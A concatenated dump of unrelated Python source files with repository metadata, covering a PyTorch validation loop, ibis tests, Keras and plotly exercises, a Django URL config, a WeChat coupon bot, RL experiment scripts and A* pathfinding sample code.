# switch to train mode
model.eval()
end = time.time()
for i, data in enumerate(val_loader, 1):
input, targets = data
val_loader_len = len(val_loader)
# measure data loading time
data_time.update(time.time() - end)
input_var = Variable(input.cuda())
target_var = [Variable(ann.cuda(), requires_grad=False) for ann in targets]
# compute output
output = model(input_var)
loss_l_pa1l, loss_c_pal1 = criterion(output[0:2], priors_pal1, target_var)
loss_l_pa12, loss_c_pal2 = criterion(output[2:4], priors_pal2, target_var)
loss = loss_l_pa1l + loss_c_pal1 + loss_l_pa12 + loss_c_pal2
loss_l = loss_l_pa1l + loss_l_pa12
loss_c = loss_c_pal1 + loss_c_pal2
if args.distributed:
reduced_loss = reduce_tensor(loss.data)
reduced_loss_l = reduce_tensor(loss_l.data)
reduced_loss_c = reduce_tensor(loss_c.data)
else:
reduced_loss = loss.data
reduced_loss_l = loss_l.data
reduced_loss_c = loss_c.data
losses.update(to_python_float(reduced_loss), input.size(0))
loc_loss.update(to_python_float(reduced_loss_l), input.size(0))
cls_loss.update(to_python_float(reduced_loss_c), input.size(0))
torch.cuda.synchronize()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if args.local_rank == 0 and i % args.print_freq == 0 and i >= 0:
print('[{0}/{1}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Speed {2:.3f} ({3:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'loc_loss {loc_loss.val:.3f} ({loc_loss.avg:.3f})\t'
'cls_loss {cls_loss.val:.3f} ({cls_loss.avg:.3f})'.format(
i, val_loader_len,
args.total_batch_size / batch_time.val,
args.total_batch_size / batch_time.avg,
batch_time=batch_time,
data_time=data_time, loss=losses, loc_loss=loc_loss, cls_loss=cls_loss))
return losses.avg
def to_python_float(t):
if hasattr(t, 'item'):
return t.item()
else:
return t[0]
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def reduce_tensor(tensor):
rt = tensor.clone()
dist.all_reduce(rt, op=dist.reduce_op.SUM)
rt /= args.world_size
return rt
def adjust_learning_rate(optimizer, epoch, step, len_epoch):
"""LR schedule that should yield 76% converged accuracy with batch size 256"""
factor = epoch // 10
if epoch >= 30:
factor = factor + 1
lr = args.lr * (0.1 ** factor)
"""Warmup"""
if epoch < 1:
lr = lr * float(1 + step + epoch * len_epoch) / (5. * len_epoch)
if(args.local_rank == 0 and step % args.print_freq == 0 and step > 1):
print("Epoch = {}, step = {}, lr = {}".format(epoch, step, lr))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def save_checkpoint(state, is_best, epoch):
filename = os.path.join(args.save_folder, args.prefix + str(epoch)+ ".pth")
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, os.path.join(args.save_folder, 'model_best.pth'))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
72d0a91efae53216da61610416aa816a93f0d33a | a6ef13387c24c719a0dcfeb173521cd70beac282 | /python1/mod_call_fibs.py | 9415180ce0991ba45b0e4e2af1218228cf63e8c3 | [] | no_license | youjiahe/python | f60472d61daf58b7f5bb6aa557949de4babf8c9c | 74eb4c5ba211ae5ffed2040576e5eead75d16e7d | refs/heads/master | 2020-03-31T02:35:55.787809 | 2019-12-02T16:32:54 | 2019-12-02T16:32:54 | 151,831,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 118 | py | #!/usr/bin/env python3
import mod_fibs
import mod_fibs as f
from mod_fibs import fib
mod_fibs.fib()
f.fib(5)
fib(10)
| [
"[email protected]"
] | |
605cceafb7745578da0e5040c7db03dccc5e5ffc | c5b69745b12ad36241fa792af44480eb70918cb0 | /ibis/tests/expr/test_literal.py | d43226d69d94263d4b54d263c8d01711f06d49e2 | [
"Apache-2.0"
] | permissive | vishalbelsare/ibis | bdbfde79086b268f4592cde009e0ffa52ece97e6 | 3fd6afb223fa442ccd0d9db69a74a431d5e7bcca | refs/heads/master | 2023-08-16T16:23:00.535467 | 2021-11-23T15:33:35 | 2021-11-23T15:33:35 | 141,067,229 | 0 | 0 | Apache-2.0 | 2021-11-29T20:12:43 | 2018-07-16T00:06:27 | Python | UTF-8 | Python | false | false | 1,388 | py | import ibis
from ibis.expr import datatypes
from ibis.expr.operations import Literal
from ibis.tests.util import assert_pickle_roundtrip
def test_literal_equality_basic():
a = ibis.literal(1).op()
b = ibis.literal(1).op()
assert a == b
assert hash(a) == hash(b)
def test_literal_equality_int_float():
# Note: This is different from the Python behavior for int/float comparison
a = ibis.literal(1).op()
b = ibis.literal(1.0).op()
assert a != b
def test_literal_equality_int16_int32():
# Note: This is different from the Python behavior for int/float comparison
a = Literal(1, datatypes.int16)
b = Literal(1, datatypes.int32)
assert a != b
def test_literal_equality_int_interval():
a = ibis.literal(1).op()
b = ibis.interval(seconds=1).op()
assert a != b
def test_literal_equality_interval():
a = ibis.interval(seconds=1).op()
b = ibis.interval(minutes=1).op()
assert a != b
# Currently these does't equal, but perhaps should be?
c = ibis.interval(seconds=60).op()
d = ibis.interval(minutes=1).op()
assert c != d
def test_pickle_literal():
a = Literal(1, datatypes.int16)
b = Literal(1, datatypes.int32)
assert_pickle_roundtrip(a)
assert_pickle_roundtrip(b)
def test_pickle_literal_interval():
a = ibis.interval(seconds=1).op()
assert_pickle_roundtrip(a)
| [
"[email protected]"
] | |
ae33e5e64e5edcb987ff8edd262f7a45e2a61f7b | 48c4dda8fbecb5bc9506eb0a318508c9a9f37aca | /deep learning from scratch.py | e10c1b2aa591751efd915dc08f92debac8407696 | [] | no_license | bigeyesung/DLkaggle | f59e8e2fdac430fd5e97cfc67e63c837a8b12cee | f57b10740b206ecff1bcbfdc7d4436ac8dcac28d | refs/heads/master | 2023-07-05T22:16:03.042595 | 2021-08-07T15:48:54 | 2021-08-07T15:48:54 | 262,594,538 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,766 | py | import numpy as np
from sklearn.model_selection import train_test_split
from tensorflow import keras
img_rows, img_cols = 28, 28
num_classes = 10
def prep_data(raw):
y = raw[:, 0]
out_y = keras.utils.to_categorical(y, num_classes)
x = raw[:,1:]
num_images = raw.shape[0]
out_x = x.reshape(num_images, img_rows, img_cols, 1)
out_x = out_x / 255
return out_x, out_y
fashion_file = "../input/fashionmnist/fashion-mnist_train.csv"
fashion_data = np.loadtxt(fashion_file, skiprows=1, delimiter=',')
x, y = prep_data(fashion_data)
# Set up code checking
from learntools.core import binder
binder.bind(globals())
from learntools.deep_learning.exercise_7 import *
print("Setup Complete")
# 1) Start the model
from tensorflow import keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, Conv2D
fashion_model= Sequential()
# Add the first layer
fashion_model.add(Conv2D(12,kernel_size=3,activation='relu',input_shape=(img_rows,img_cols,1)))
#3) Add the remaining layers
fashion_model.add(Conv2D(20,kernel_size=3,activation='relu'))
fashion_model.add(Conv2D(20,kernel_size=3,activation='relu'))
fashion_model.add(Flatten())
fashion_model.add(Dense(100,activation='relu'))
fashion_model.add(Dense(num_classes, activation='softmax'))
# 4) Compile Your Model
fashion_model.compile(loss=keras.losses.categorical_crossentropy,optimizer='adam',metrics=['accuracy'])
# 5) Fit The Model
fashion_model.fit(x,y,batch_size=100,epochs=4,validation_split=0.2)
# 6) Create A New Model
second_fashion_model = Sequential()
second_fashion_model.add(Conv2D(12,
activation='relu',
kernel_size=3,
input_shape = (img_rows, img_cols, 1)))
# Changed kernel sizes to be 2
second_fashion_model.add(Conv2D(20, activation='relu', kernel_size=2))
second_fashion_model.add(Conv2D(20, activation='relu', kernel_size=2))
# added an addition Conv2D layer
second_fashion_model.add(Conv2D(20, activation='relu', kernel_size=2))
second_fashion_model.add(Flatten())
second_fashion_model.add(Dense(100, activation='relu'))
# It is important not to change the last layer. First argument matches number of classes. Softmax guarantees we get reasonable probabilities
second_fashion_model.add(Dense(10, activation='softmax'))
second_fashion_model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
second_fashion_model.fit(x, y, batch_size=100, epochs=4, validation_split=0.2)
#second_fashion_model.add(Conv2D(30,kernel_size=3,activation='relu',input_shape=(img_rows,img_cols,1)))
#second_fashion_model.fit(x,y,batch_size=100,epochs=4,validation_split=0.2)
| [
"[email protected]"
] | |
9cdfc43db870a09854c65404a963963d2cb4b43d | bbf744bfbfd9a935bd98c7cf54152a5d41194161 | /chapter_15/die_visual.py | d9629d134497d4af77867b78e009e95a6471a52b | [] | no_license | terranigmark/python-crash-course-projects | 65a7863be2d26fe8b91ac452b12203386eb0259a | 79ed9ed8e6a1bf015990a9556689379274231d13 | refs/heads/master | 2022-12-05T21:59:00.352140 | 2020-08-21T04:59:50 | 2020-08-21T04:59:50 | 266,263,493 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | from plotly.graph_objs import Bar, Layout
from plotly import offline
from die import Die
# create a D6
die_1 = Die()
die_2 = Die(10)
# make some rolls and store results in a list
results = []
for roll_num in range(50_000):
result = die_1.roll() + die_2.roll()
results.append(result)
# analyze the results
frequencies = []
max_result = die_1.num_sides + die_2.num_sides
for value in range(2, die_1.num_sides + die_2.num_sides):
frequency = results.count(value)
frequencies.append(frequency)
# visualize the results
x_values = list(range(2, max_result + 1))
data = [Bar(x = x_values, y = frequencies)]
x_axis_config = {'title': 'Result', 'dtick': 1}
y_axis_config = {'title': 'Frequency of Result'}
my_layout = Layout(title = 'Results of rolling two D6 and D10 50,000 times', xaxis = x_axis_config, yaxis = y_axis_config)
offline.plot({'data': data, 'layout': my_layout}, filename = 'd6_d10.html') | [
"[email protected]"
] | |
cc0f68e8359cb95579b7d20bc6c3581cdc712cbd | 5e5e99e8493fbef64847494caf059c910c03c823 | /arrays/palindromic-substrings.py | b398b82336fa0371d58df3ab24c16dec63daf978 | [] | no_license | jcockbain/leetcode-python | f4e487b13ae4cacef9cbedfd4358f8ee0006e2b8 | d7f83ea5a11e4c8340c48698d29aa3bc0b942121 | refs/heads/master | 2020-07-09T19:58:42.933881 | 2019-10-28T23:34:34 | 2019-10-28T23:34:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 362 | py | def countSubstrings(self, s):
"""
:type s: str
:rtype: int
"""
N = len(s)
ans = 0
for center in range(2*N - 1):
left = center / 2
right = left + center % 2
while left >= 0 and right < N \
and s[left] == s[right]:
ans += 1
left -= 1
right += 1
return ans
| [
"[email protected]"
] | |
0ba3ed98a522196a66863cdd0ce816654065b1b2 | 96a34a048c783a75736bf0ec775df22142f9ee53 | /services/web/server/src/simcore_service_webserver/db_listener/plugin.py | a4fda5b69bdff33c6386eee2e702f5c74e8bbb01 | [
"MIT"
] | permissive | ITISFoundation/osparc-simcore | 77e5b9f7eb549c907f6ba2abb14862154cc7bb66 | f4c57ffc7b494ac06a2692cb5539d3acfd3d1d63 | refs/heads/master | 2023-08-31T17:39:48.466163 | 2023-08-31T15:03:56 | 2023-08-31T15:03:56 | 118,596,920 | 39 | 29 | MIT | 2023-09-14T20:23:09 | 2018-01-23T10:48:05 | Python | UTF-8 | Python | false | false | 870 | py | """
computation module is the main entry-point for computational backend
"""
import logging
from aiohttp import web
from servicelib.aiohttp.application_setup import ModuleCategory, app_module_setup
from ..db.plugin import setup_db
from ..projects.db import setup_projects_db
from ..rabbitmq import setup_rabbitmq
from ..socketio.plugin import setup_socketio
from ._db_comp_tasks_listening_task import create_comp_tasks_listening_task
_logger = logging.getLogger(__name__)
@app_module_setup(
__name__,
ModuleCategory.ADDON,
settings_name="WEBSERVER_DB_LISTENER",
logger=_logger,
)
def setup_db_listener(app: web.Application):
setup_rabbitmq(app)
setup_socketio(app)
setup_projects_db(app)
# Creates a task to listen to comp_task pg-db's table events
setup_db(app)
app.cleanup_ctx.append(create_comp_tasks_listening_task)
| [
"[email protected]"
] | |
2671fbfa345590729a83bef8261428be9a1bf018 | f8d5c4eb0244c4a227a615bc11c4c797760c3bec | /utils/rldraw.py | 2e944f936c3ad5ea6d074a6f0f9d74759cdd0c70 | [] | no_license | SamPlvs/reinforcement_learning_pytorch | e9b84659f870d938814177f1288fa4a2eb152599 | ffb9e53eeff011c4d3d5933a60c2b65fdbb18e2a | refs/heads/master | 2020-03-23T04:08:51.778325 | 2018-01-16T22:36:48 | 2018-01-16T22:36:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 475 | py | import matplotlib.pyplot as plt
import numpy as np
def reward_episode(rewards, image_path, env_name='', method_name='', comment=''):
reward_list = rewards
total_num = np.shape(reward_list)[0]
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(list(range(total_num)), reward_list)
ax.set_xlabel('iteration')
ax.set_ylabel('rewards')
fig.suptitle("rewards_episodes_{}_{}_{}".format(env_name, method_name, comment))
fig.savefig(image_path) | [
"[email protected]"
] | |
5a75b3e5fcce03f7bd10d309196f67bdbc85c252 | 1d641f71f7aab082ed0b3ee805d6ff24b012ca2d | /ecommerce/carts/urls.py | aacdcfc353ac76fe4c2a60b52d83aa8708090caa | [] | no_license | Arkajit-m18/django-mca-major-project | 3d63ac96cd32c49e9a95629a680c5b0b7561cbd3 | 59b6f39d923a7e134bbb4bbb769bc06721321760 | refs/heads/master | 2020-05-18T00:31:44.435948 | 2019-05-15T15:23:21 | 2019-05-15T15:23:21 | 184,065,280 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 334 | py | from django.urls import path
from . import views
app_name = 'carts'
urlpatterns = [
path('', views.cart_home, name = 'cart_home'),
path('update/', views.cart_update, name = 'cart_update'),
path('checkout/', views.checkout_home, name = 'checkout'),
path('checkout/success/', views.checkout_done, name = 'success'),
] | [
"[email protected]"
] | |
ca0d04658eb03c43a7dceddf7338d8c1f5cd372f | 346cf248e94fe97ba9c0a841827ab77f0ed1ff20 | /experiments/kdd-exps/experiment_DynaQtable_130_Feb14_0029.py | efabd8516978796f715bed1b20adcd12deaf5f2b | [
"BSD-3-Clause"
] | permissive | huangxf14/deepnap | cae9c7c654223f6202df05b3c3bc5053f9bf5696 | b4627ce1b9022d4f946d9b98d8d1622965cb7968 | refs/heads/master | 2020-03-26T02:54:01.352883 | 2018-08-12T01:55:14 | 2018-08-12T01:55:14 | 144,429,728 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,623 | py | # System built-in modules
import time
from datetime import datetime
import sys
import os
from multiprocessing import Pool
# Project dependency modules
import pandas as pd
pd.set_option('mode.chained_assignment', None) # block warnings due to DataFrame value assignment
import lasagne
# Project modules
sys.path.append('../')
from sleep_control.traffic_emulator import TrafficEmulator
from sleep_control.traffic_server import TrafficServer
from sleep_control.controller import QController, DummyController, NController
from sleep_control.integration import Emulation
from sleep_control.env_models import SJTUModel
from rl.qtable import QAgent
from rl.qnn_theano import QAgentNN
from rl.mixin import PhiMixin, DynaMixin
sys_stdout = sys.stdout
log_prefix = '_'.join(['msg'] + os.path.basename(__file__).replace('.', '_').split('_')[1:5])
log_file_name = "{}_{}.log".format(log_prefix, sys.argv[1])
# Composite classes
class Dyna_QAgent(DynaMixin, QAgent):
def __init__(self, **kwargs):
super(Dyna_QAgent, self).__init__(**kwargs)
# Parameters
# |- Data
location = 'gym'
# |- Agent
# |- QAgent
actions = [(True, None), (False, 'serve_all')]
gamma, alpha = 0.9, 0.9 # TD backup
explore_strategy, epsilon = 'epsilon', 0.02 # exploration
# |- QAgentNN
# | - No Phi
phi_length = 0
dim_state = (1, 1, 3)
range_state = ((((0, 10), (0, 10), (0, 10)),),)
# | - Other params
momentum, learning_rate = 0.9, 0.01 # SGD
num_buffer, memory_size, batch_size, update_period, freeze_period = 2, 200, 100, 4, 16
reward_scaling, reward_scaling_update, rs_period = 1, 'adaptive', 32 # reward scaling
# |- Env model
model_type, traffic_window_size = 'IPP', 50
stride, n_iter, adjust_offset = 2, 3, 1e-22
eval_period, eval_len = 4, 100
n_belief_bins, max_queue_len = 5, 20
Rs, Rw, Rf, Co, Cw = 1.0, -1.0, -10.0, -5.0, -0.5
traffic_params = (model_type, traffic_window_size,
stride, n_iter, adjust_offset,
eval_period, eval_len,
n_belief_bins)
queue_params = (max_queue_len,)
beta = 0.5 # R = (1-beta)*ServiceReward + beta*Cost
reward_params = (Rs, Rw, Rf, Co, Cw, beta)
# |- DynaQ
num_sim = 5
# |- Env
# |- Time
start_time = pd.to_datetime("2014-10-15 09:40:00")
total_time = pd.Timedelta(days=7)
time_step = pd.Timedelta(seconds=2)
backoff_epochs = num_buffer*memory_size+phi_length
head_datetime = start_time - time_step*backoff_epochs
tail_datetime = head_datetime + total_time
TOTAL_EPOCHS = int(total_time/time_step)
# |- Reward
rewarding = {'serve': Rs, 'wait': Rw, 'fail': Rf}
# load from processed data
session_df =pd.read_csv(
filepath_or_buffer='../data/trace_{}.dat'.format(location),
parse_dates=['startTime_datetime', 'endTime_datetime']
)
te = TrafficEmulator(
session_df=session_df, time_step=time_step,
head_datetime=head_datetime, tail_datetime=tail_datetime,
rewarding=rewarding,
verbose=2)
ts = TrafficServer(cost=(Co, Cw), verbose=2)
env_model = SJTUModel(traffic_params, queue_params, reward_params, 2)
agent = Dyna_QAgent(
env_model=env_model, num_sim=num_sim,
# Below is QAgent params
actions=actions, alpha=alpha, gamma=gamma,
explore_strategy=explore_strategy, epsilon=epsilon,
verbose=2)
c = QController(agent=agent)
emu = Emulation(te=te, ts=ts, c=c, beta=beta)
# Heavyliftings
t = time.time()
sys.stdout = sys_stdout
log_path = './log/'
if os.path.isfile(log_path+log_file_name):
print "Log file {} already exist. Experiment cancelled.".format(log_file_name)
else:
log_file = open(log_path+log_file_name,"w")
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'),
print '{}%'.format(int(100.0*emu.epoch/TOTAL_EPOCHS)),
print log_file_name
time.sleep(1)
sys.stdout = log_file
while emu.epoch is not None and emu.epoch<TOTAL_EPOCHS:
# log time
print "Epoch {},".format(emu.epoch),
left = emu.te.head_datetime + emu.te.epoch*emu.te.time_step
right = left + emu.te.time_step
print "{} - {}".format(left.strftime("%Y-%m-%d %H:%M:%S"), right.strftime("%Y-%m-%d %H:%M:%S"))
emu.step()
print
if emu.epoch%(0.05*TOTAL_EPOCHS)==0:
sys.stdout = sys_stdout
print datetime.now().strftime('[%Y-%m-%d %H:%M:%S]'),
print '{}%'.format(int(100.0*emu.epoch/TOTAL_EPOCHS)),
print log_file_name
time.sleep(1)
sys.stdout = log_file
sys.stdout = sys_stdout
log_file.close()
print
print log_file_name,
print '{:.3f} sec,'.format(time.time()-t),
print '{:.3f} min'.format((time.time()-t)/60)
| [
"[email protected]"
] | |
6fdc3db5b428914f4813bf4199befece5ed7563e | df4a7c46c46d1eca6570493b9707bdf64e54f8d3 | /py/209.minimum-size-subarray-sum.py | adaf3f0e6093c8efaad3d2fbdcb5fae7fb66b2a1 | [] | no_license | CharmSun/my-leetcode | 52a39bf719c507fb7032ed424fe857ba7340aea3 | 5325a56ba8c40d74d9fef2b19bac63a4e2c44a38 | refs/heads/master | 2023-03-29T06:39:49.614264 | 2021-03-28T16:33:52 | 2021-03-28T16:33:52 | 261,364,001 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | #
# @lc app=leetcode id=209 lang=python3
#
# [209] Minimum Size Subarray Sum
#
# @lc code=start
from typing import List
class Solution:
# 双指针移动
def minSubArrayLen(self, target: int, nums: List[int]) -> int:
if not nums:
return 0
left = 0
right = -1
sum = 0
length = len(nums) + 1
while left < len(nums) and right < len(nums):
if right < len(nums) - 1 and sum < target:
right += 1
sum += nums[right]
else:
sum -= nums[left]
left += 1
if sum >= target:
length = min(length, right - left + 1)
if length == len(nums) + 1:
return 0
return length
# @lc code=end
| [
"[email protected]"
] | |
e80ac8c78a628d36e3b4d0788d9adfb5968ae19d | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/flicker.py | c9770573731f1ec62ddbbc5ee7fd117eb6088ec5 | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 546 | py | ii = [('CookGHP3.py', 1), ('KembFJ1.py', 1), ('TennAP.py', 1), ('CarlTFR.py', 5), ('LyttELD.py', 1), ('TalfTAC.py', 1), ('AinsWRR3.py', 1), ('BailJD1.py', 1), ('RoscTTI2.py', 1), ('GilmCRS.py', 1), ('DibdTRL2.py', 1), ('AinsWRR.py', 1), ('MedwTAI.py', 1), ('FerrSDO2.py', 1), ('TalfTIT.py', 3), ('MedwTAI2.py', 1), ('HowiWRL2.py', 1), ('MartHRW.py', 2), ('LyttELD3.py', 4), ('KembFJ2.py', 1), ('AinsWRR2.py', 1), ('BrewDTO.py', 1), ('ClarGE3.py', 1), ('RogeSIP.py', 1), ('MartHRW2.py', 1), ('MartHSI.py', 2), ('NortSTC.py', 1), ('BeckWRE.py', 1)] | [
"[email protected]"
] | |
09228ae64537dd9fb78fcabb808a96dacec36126 | 2ab391bfaadf0743da8ffee084896b999e88482d | /wx.py | a2bd1358136ac0530889f2fe820be14236fd42ec | [] | no_license | wean/coupon-windows | 552a59637ea45539bdfa70c6d1bd04626f0fdbd0 | 9565b23c7f44594f182d7a268d4ed45bdeaf8dd3 | refs/heads/master | 2020-04-05T07:11:43.024665 | 2017-11-24T08:23:50 | 2017-11-24T08:23:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,676 | py | # -*- coding:utf-8 -*-
import random
import itchat
import time
from schedule import Schedule
from search import SearchingKeyRegex
from special import Searcher
from utils import getProperty, randomSleep, reprDict
class WX(Schedule):
def __init__(self, configFile):
Schedule.__init__(self, configFile)
self.searcher = Searcher(configFile)
self.configFile = configFile
def login(self, exitCallback, uuid=None):
def isLoginned(uuid):
for count in range(10):
status = int(itchat.check_login(uuid))
if status is 200:
return True
if status is 201:
print 'Wait for confirm in mobile #', count
randomSleep(1, 2)
continue
print 'Error status:', status
return False
return False
if uuid is None:
statusFile = getProperty(self.configFile, 'wechat-status-file')
itchat.auto_login(hotReload=True, statusStorageDir=statusFile)
else:
if not isLoginned(uuid):
raise Exception('Failed to login with {}'.format(uuid))
userInfo = itchat.web_init()
itchat.show_mobile_login()
itchat.get_friends(True)
itchat.start_receiving(exitCallback)
self.me = itchat.search_friends()
print self.me['NickName'], 'is working'
self.watchFriends = list()
names = getProperty(self.configFile, 'wechat-watch-friends').split(';')
for name in names:
friends = itchat.search_friends(name=name)
self.watchFriends.extend(friends)
self.watchGroups = list()
names = getProperty(self.configFile, 'wechat-watch-groups').split(';')
for name in names:
groups = itchat.search_chatrooms(name=name)
self.watchGroups.extend(groups)
self.searchReplyPlate = getProperty(self.configFile, 'search-reply-plate')
itchat.run(blockThread=False) # Run in a new thread
self.run()
@staticmethod
def sendTo(obj, plate=None, image=None):
print '================================================================'
print 'Send a message to', obj['NickName']
if plate is not None:
interval = random.random() * 10
time.sleep(interval)
ret = obj.send(plate)
print 'Result of text message:', ret['BaseResponse']['ErrMsg']
print '----------------------------------------------------------------'
print plate
print '----------------------------------------------------------------'
if image is not None:
interval = random.random() * 10
time.sleep(interval)
ret = obj.send_image(image)
print 'Result of', image, ':', ret['BaseResponse']['ErrMsg']
print '================================================================'
def text(self, msg):
for friend in self.watchFriends:
if msg['FromUserName'] == friend['UserName']:
break
else:
return
print '================================================================'
print msg['User']['NickName'], 'sends a message:'
print '----------------------------------------------------------------'
print msg['Content']
print '================================================================'
self.search(friend, msg['Content'])
def textGroup(self, msg):
for friend in self.watchGroups:
if msg['FromUserName'] == friend['UserName']:
break
else:
return
print '================================================================'
print msg['User']['NickName'], 'sends a message:'
print '----------------------------------------------------------------'
print msg['Content']
print '================================================================'
self.search(friend, msg['Content'])
def send(self, plate, image):
for friend in self.watchFriends:
WX.sendTo(friend, plate, image)
def search(self, friend, content):
content = SearchingKeyRegex.parse(content)
if content is None:
return
print 'Searching', content
WX.sendTo(friend, self.searchReplyPlate.format(content.replace('#', ' ')))
if not self.searcher.search(content):
return
WX.sendTo(friend, self.searcher.plate, self.searcher.image)
| [
"[email protected]"
] | |
cb97bf7ae5fc7b209d27f00b58948f0f6626da16 | 8d38f23ec63e75f433d5de33c5d9bc51c9d7ac90 | /choco_py/03/__init__.py | f9160e38a2c85aee2b289c5caaf6fd40b73d3da4 | [] | no_license | aliwo/ChocoPy | 4a957468ef38a3bfcd99f112541e6e5b0e2adbdc | eb339c4103e5400c2cf8435b1d6af5f7b3b60548 | refs/heads/master | 2023-05-27T09:38:28.609554 | 2019-10-19T12:09:03 | 2019-10-19T12:09:03 | 211,509,685 | 5 | 1 | null | 2023-05-01T21:15:21 | 2019-09-28T14:06:06 | Python | UTF-8 | Python | false | false | 100 | py | # 이제 초코 변수들이 현재 갖고 있는 초코의 양을 나타내게 되었습니다.
| [
"[email protected]"
] | |
10bd16b2629d3c226a90fa9ed757fd210049d940 | 2e1c1558f6fcb12a57449f9f6f0db6f1cbf38dd6 | /tests/integrations/test_package/config/test.py | 1523cb68f132b4ed41f31b404461758a9e2d19e6 | [
"MIT"
] | permissive | MasoniteFramework/masonite | ca51bf3d0e4777e624b3a9e94d1360936fb8006d | e8e55e5fdced9f28cc8acb1577457a490e5b4b74 | refs/heads/4.0 | 2023-09-01T18:59:01.331411 | 2022-11-05T01:29:29 | 2022-11-05T01:29:29 | 113,248,605 | 2,173 | 185 | MIT | 2023-04-02T02:29:18 | 2017-12-06T00:30:22 | Python | UTF-8 | Python | false | false | 29 | py | PARAM_1 = "test"
PARAM_2 = 1
| [
"[email protected]"
] | |
beead89528382b978348836d26fab1b78be43800 | 26e4bea46942b9afa5a00b9cde9a84f2cc58e3c9 | /pygame/Astar/implementation.py | 4965fc01f99a6ab2206ed2468d00869b3bb21107 | [] | no_license | MeetLuck/works | 46da692138cb9741a913d84eff6822f107510dc7 | ab61175bb7e2ed5c5113bf150e0541ae18eb04c4 | refs/heads/master | 2020-04-12T05:40:25.143075 | 2017-08-21T17:01:06 | 2017-08-21T17:01:06 | 62,373,576 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,781 | py | # Sample code from http://www.redblobgames.com/pathfinding/
# Copyright 2014 Red Blob Games <[email protected]>
#
# Feel free to use this code in your own projects, including commercial projects
# License: Apache v2.0 <http://www.apache.org/licenses/LICENSE-2.0.html>
from __future__ import print_function
class SimpleGraph:
def __init__(self):
self.edges = {}
def neighbors(self, id):
return self.edges[id]
example_graph = SimpleGraph()
example_graph.edges = {
'A': ['B'],
'B': ['A', 'C', 'D'],
'C': ['A'],
'D': ['E', 'A'],
'E': ['B']
}
import collections
class Queue:
def __init__(self):
self.elements = collections.deque()
def empty(self):
return len(self.elements) == 0
def put(self, x):
self.elements.append(x)
def get(self):
return self.elements.popleft()
# utility functions for dealing with square grids
def from_id_width(id, width):
return (id % width, id // width)
def draw_tile(graph, id, style, width):
r = "."
if 'number' in style and id in style['number']: r = "%d" % style['number'][id]
if 'point_to' in style and style['point_to'].get(id, None) is not None:
(x1, y1) = id
(x2, y2) = style['point_to'][id]
if x2 == x1 + 1: r = "\u2192"
if x2 == x1 - 1: r = "\u2190"
if y2 == y1 + 1: r = "\u2193"
if y2 == y1 - 1: r = "\u2191"
if 'start' in style and id == style['start']: r = "A"
if 'goal' in style and id == style['goal']: r = "Z"
if 'path' in style and id in style['path']: r = "@"
if id in graph.walls: r = "#" * width
return r
def draw_grid(graph, width=2, **style):
for y in range(graph.height):
for x in range(graph.width):
print("%%-%ds" % width % draw_tile(graph, (x, y), style, width), end="")
print()
# data from main article
DIAGRAM1_WALLS = [from_id_width(id, width=30) for id in [21,22,51,52,81,82,93,94,111,112,123,124,133,134,141,142,153,154,163,164,171,172,173,174,175,183,184,193,194,201,202,203,204,205,213,214,223,224,243,244,253,254,273,274,283,284,303,304,313,314,333,334,343,344,373,374,403,404,433,434]]
class SquareGrid:
def __init__(self, width, height):
self.width = width
self.height = height
self.walls = []
def in_bounds(self, id):
(x, y) = id
return 0 <= x < self.width and 0 <= y < self.height
def passable(self, id):
return id not in self.walls
def neighbors(self, id):
(x, y) = id
results = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]
if (x + y) % 2 == 0: results.reverse() # aesthetics
results = filter(self.in_bounds, results)
results = filter(self.passable, results)
return results
class GridWithWeights(SquareGrid):
def __init__(self, width, height):
SquareGrid.__init__(self,width, height)
self.weights = {}
def cost(self, from_node, to_node):
return self.weights.get(to_node, 1)
diagram4 = GridWithWeights(10, 10)
diagram4.walls = [(1, 7), (1, 8), (2, 7), (2, 8), (3, 7), (3, 8)]
diagram4.weights = {loc: 5 for loc in [(3, 4), (3, 5), (4, 1), (4, 2),
(4, 3), (4, 4), (4, 5), (4, 6),
(4, 7), (4, 8), (5, 1), (5, 2),
(5, 3), (5, 4), (5, 5), (5, 6),
(5, 7), (5, 8), (6, 2), (6, 3),
(6, 4), (6, 5), (6, 6), (6, 7),
(7, 3), (7, 4), (7, 5)]}
import heapq
class PriorityQueue:
def __init__(self):
self.elements = []
def empty(self):
return len(self.elements) == 0
def put(self, item, priority):
heapq.heappush(self.elements, (priority, item))
def get(self):
return heapq.heappop(self.elements)[1]
def dijkstra_search(graph, start, goal):
frontier = PriorityQueue()
frontier.put(start, 0)
came_from = {}
cost_so_far = {}
came_from[start] = None
cost_so_far[start] = 0
